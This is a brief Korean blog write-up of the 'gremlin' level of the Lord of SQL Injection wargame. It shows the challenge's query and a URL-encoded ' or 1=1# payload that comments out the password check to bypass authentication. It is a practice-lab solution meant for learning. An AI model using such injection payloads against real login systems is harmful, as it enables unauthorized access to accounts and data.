LOS gremlin writeup
문제 확인을 해보면,
위와 같이 나와있고, GET방식으로 되어있음을 알게 된다.
http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=yeali&pw=1234
이렇게 입력을 하면,
query : select id from prob_gremlin where id='yeali' and pw='1234'
쿼리문이 이렇게 변경되게 된다.
id와 pw를 성립하게 해주면 되는 문제인듯하다.
http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id='or 1=1#&pw=
이렇게 해서 #뒤에는 주석처리를 해주려고 했으나 #이 안들어간다. url 인코딩을 해줘야 하나보다!
http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=%27or%201=1%23&pw=
이렇게 하면 성공!
'WebHacking > Lord of SQL injection Write-Up' 카테고리의 다른 글
| LOS goblin writeup (0) | 2018.07.20 |
|---|---|
| LOS cobolt writeup (0) | 2018.07.20 |